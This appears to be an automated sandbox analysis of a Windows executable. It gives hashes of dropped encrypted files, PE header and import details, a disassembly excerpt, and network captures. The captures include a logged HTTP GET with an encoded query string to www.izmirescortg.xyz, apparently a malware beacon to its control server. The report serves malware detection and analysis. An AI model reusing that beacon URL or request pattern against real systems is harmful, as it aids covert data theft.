SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Gz2FxKx2cM.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.996087003661156
Encrypted: true
SSDEEP: 6144:mc0Gsj26YmWr3in6rJNTLe505hNSHlc1x3qqYAslQV:mwspWr33V5hNSoqqY1iV
MD5: 51E59B61B3770AFF8E2491C74F537A7C
SHA1: DE27E6BBA6939794BBAE5D78C4FE7024102FC4E0
SHA-256: BE01C0DF655404CC17A3D83B3CE0205A934354C5170C09BD6F9A2239905947EF
SHA-512: DD6DF636B49E2E0B383730BF118FB233A63E8D3C994B8529413807D190A0605C05704104B314F3A8406CF0F23D5DF9BD3013EB0598088BDBA6ECBE8CC3300CAF
Malicious: false
Reputation: low
                                        Preview:...SWXIV^M29..6S.0410LKPxZ7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTX.VZM<&.K6.0...1..ql2^5o*!;?;77mQX/+Y'.RQ.B9%pQ4....s97-3t@?3eE6S9041IMB..:P.r:4.e)1.W....V4.*...p+7.@..f33..?9%.Y&.6S90410L..8Z{GNZ.|.)VZM29AE6.925:1GKPh^7FOZSTXIV.Y29AU6S9P010L.P8J7FOXST^IVZM29AC6S90410L+T8Z5FOZSTXKV..29QE6C9041 LK@8Z7FOZCTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7h;?+ XIV..69AU6S9`010\KP8Z7FOZSTXIVZm29!E6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7F
Process: C:\Users\user\Desktop\Gz2FxKx2cM.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.996087003661156
Encrypted: true
SSDEEP: 6144:mc0Gsj26YmWr3in6rJNTLe505hNSHlc1x3qqYAslQV:mwspWr33V5hNSoqqY1iV
MD5: 51E59B61B3770AFF8E2491C74F537A7C
SHA1: DE27E6BBA6939794BBAE5D78C4FE7024102FC4E0
SHA-256: BE01C0DF655404CC17A3D83B3CE0205A934354C5170C09BD6F9A2239905947EF
SHA-512: DD6DF636B49E2E0B383730BF118FB233A63E8D3C994B8529413807D190A0605C05704104B314F3A8406CF0F23D5DF9BD3013EB0598088BDBA6ECBE8CC3300CAF
Malicious: false
                                        Preview:...SWXIV^M29..6S.0410LKPxZ7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTX.VZM<&.K6.0...1..ql2^5o*!;?;77mQX/+Y'.RQ.B9%pQ4....s97-3t@?3eE6S9041IMB..:P.r:4.e)1.W....V4.*...p+7.@..f33..?9%.Y&.6S90410L..8Z{GNZ.|.)VZM29AE6.925:1GKPh^7FOZSTXIV.Y29AU6S9P010L.P8J7FOXST^IVZM29AC6S90410L+T8Z5FOZSTXKV..29QE6C9041 LK@8Z7FOZCTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7h;?+ XIV..69AU6S9`010\KP8Z7FOZSTXIVZm29!E6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7FOZSTXIVZM29AE6S90410LKP8Z7F
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.194135370422717
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Gz2FxKx2cM.exe
File size: 1'211'904 bytes
MD5: f0483efd3c238f3181609c3aa40fdac6
SHA1: 9a5fa8d3e90ef6de9ef7117f87a9eabcb39d1189
SHA256: f3a50ff1e7a5fbde11e1f103161b01284e78d8bad05116052b6bfda6e9cac55a
SHA512: c706f5f258c3b915d5f36e4d08f926334fbf70813a786bbb08afc246aeafdbaaff92ab4a7a60e9acec3ee7079bdb6f0fe437b424aa54229916ca6734e398f3f9
SSDEEP: 24576:1u6J33O0c+JY5UZ+XC0kGso6Faj8tIty5lJ8z0YE/zdL8qWY:Xu0c++OCvkGs9FajcIty5lqI5/zp8Y
TLSH: A345CF2273DDC370CB669173BF69B7056EBF38614630B95B2F880D7DA950162262C7A3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x427dcd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675642A7 [Mon Dec 9 01:06:47 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: afcdf79be1557326c854b6e20cb900a7
                                        Instruction
                                        call 00007F35888ECD3Ah
                                        jmp 00007F35888DFB04h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007F35888DFC8Ah
                                        cmp edi, eax
                                        jc 00007F35888DFFEEh
                                        bt dword ptr [004C31FCh], 01h
                                        jnc 00007F35888DFC89h
                                        rep movsb
                                        jmp 00007F35888DFF9Ch
                                        cmp ecx, 00000080h
                                        jc 00007F35888DFE54h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007F35888DFC90h
                                        bt dword ptr [004BE324h], 01h
                                        jc 00007F35888E0160h
                                        bt dword ptr [004C31FCh], 00000000h
                                        jnc 00007F35888DFE2Dh
                                        test edi, 00000003h
                                        jne 00007F35888DFE3Eh
                                        test esi, 00000003h
                                        jne 00007F35888DFE1Dh
                                        bt edi, 02h
                                        jnc 00007F35888DFC8Fh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007F35888DFC93h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007F35888DFCE5h
                                        bt esi, 03h
                                        jnc 00007F35888DFD38h
                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD4 build 31101
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD4 build 31101
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5f5e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x711c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections (Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics):
.text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x5f5e8 | 0x5f600 | 32f3bc4089fcd6942cfd4454a158a03f | False | 0.9315331135321101 | data | 7.901033683107946 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                         Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                         RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                         RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                         RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                         RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                         RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                         RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                         RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                         RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                         RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                         RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                         RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                         RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
                                         RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                         RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                         RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                         RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                         RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                         RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                         RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                         RT_RCDATA | 0xcf7b8 | 0x568ad | data | | | 1.0003272426701872
                                         RT_GROUP_ICON | 0x126068 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                         RT_GROUP_ICON | 0x1260e0 | 0x14 | data | English | Great Britain | 1.25
                                         RT_GROUP_ICON | 0x1260f4 | 0x14 | data | English | Great Britain | 1.15
                                         RT_GROUP_ICON | 0x126108 | 0x14 | data | English | Great Britain | 1.25
                                         RT_VERSION | 0x12611c | 0xdc | data | English | Great Britain | 0.6181818181818182
                                         RT_MANIFEST | 0x1261f8 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                         DLL | Import
                                         WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                         VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                         WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                         COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                         MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                         WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                         PSAPI.DLL | GetProcessMemoryInfo
                                         IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                         USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                         UxTheme.dll | IsThemeActive
                                         KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                         USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                         GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                         COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                         ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                         SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                         ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                         OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                         Language of compilation system | Country where language is spoken | Map
                                         English | Great Britain |
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Jan 10, 2025 23:58:02.169481039 CET | 49709 | 80 | 192.168.2.8 | 104.21.36.62
                                         Jan 10, 2025 23:58:02.174387932 CET | 80 | 49709 | 104.21.36.62 | 192.168.2.8
                                         Jan 10, 2025 23:58:02.174489975 CET | 49709 | 80 | 192.168.2.8 | 104.21.36.62
                                         Jan 10, 2025 23:58:02.186089039 CET | 49709 | 80 | 192.168.2.8 | 104.21.36.62
                                         Jan 10, 2025 23:58:02.190908909 CET | 80 | 49709 | 104.21.36.62 | 192.168.2.8
                                         Jan 10, 2025 23:58:02.849024057 CET | 80 | 49709 | 104.21.36.62 | 192.168.2.8
                                         Jan 10, 2025 23:58:02.849045992 CET | 80 | 49709 | 104.21.36.62 | 192.168.2.8
                                         Jan 10, 2025 23:58:02.849203110 CET | 49709 | 80 | 192.168.2.8 | 104.21.36.62
                                         Jan 10, 2025 23:58:02.849241972 CET | 80 | 49709 | 104.21.36.62 | 192.168.2.8
                                         Jan 10, 2025 23:58:02.849284887 CET | 49709 | 80 | 192.168.2.8 | 104.21.36.62
                                         Jan 10, 2025 23:58:02.852375031 CET | 49709 | 80 | 192.168.2.8 | 104.21.36.62
                                         Jan 10, 2025 23:58:02.858319044 CET | 80 | 49709 | 104.21.36.62 | 192.168.2.8
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Jan 10, 2025 23:58:02.147236109 CET | 53731 | 53 | 192.168.2.8 | 1.1.1.1
                                         Jan 10, 2025 23:58:02.163851976 CET | 53 | 53731 | 1.1.1.1 | 192.168.2.8
                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                         Jan 10, 2025 23:58:02.147236109 CET | 192.168.2.8 | 1.1.1.1 | 0x7e64 | Standard query (0) | www.izmirescortg.xyz | A (IP address) | IN (0x0001) | false
                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                         Jan 10, 2025 23:58:02.163851976 CET | 1.1.1.1 | 192.168.2.8 | 0x7e64 | No error (0) | www.izmirescortg.xyz | | 104.21.36.62 | A (IP address) | IN (0x0001) | false
                                         Jan 10, 2025 23:58:02.163851976 CET | 1.1.1.1 | 192.168.2.8 | 0x7e64 | No error (0) | www.izmirescortg.xyz | | 172.67.186.192 | A (IP address) | IN (0x0001) | false
                                        • www.izmirescortg.xyz
                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         0 | 192.168.2.8 | 49709 | 104.21.36.62 | 80 | 6844 | C:\Program Files (x86)\VCqpPIwNRgsZYpxxsjcXHuaCAajCQWlrBjxviTMbIQwEqedTnqLhgHRYMfruChshOxIauwNogNNRziyx\HFOpYoEqWJkRNv.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Jan 10, 2025 23:58:02.186089039 CET | 377 | OUT |
                                         GET /lnl7/?_Lgdx=kAPJ1zL1a1XedmcrdtHAbU+8MxIg1b6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZUCCvIMy+6OdADZldWa3Ro5vmyUj0qJuSG5eCoJgas7XnA==&Vf4hC=XvLPHfTX HTTP/1.1
                                         Accept: */*
                                         Accept-Language: en-US
                                         Connection: close
                                         Host: www.izmirescortg.xyz
                                         User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                         Jan 10, 2025 23:58:02.849024057 CET | 1236 | IN |
                                         HTTP/1.1 404 Not Found
                                         Date: Fri, 10 Jan 2025 22:58:02 GMT
                                         Content-Type: text/html
                                         Transfer-Encoding: chunked
                                         Connection: close
                                         Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                         Pragma: no-cache
                                         cf-cache-status: DYNAMIC
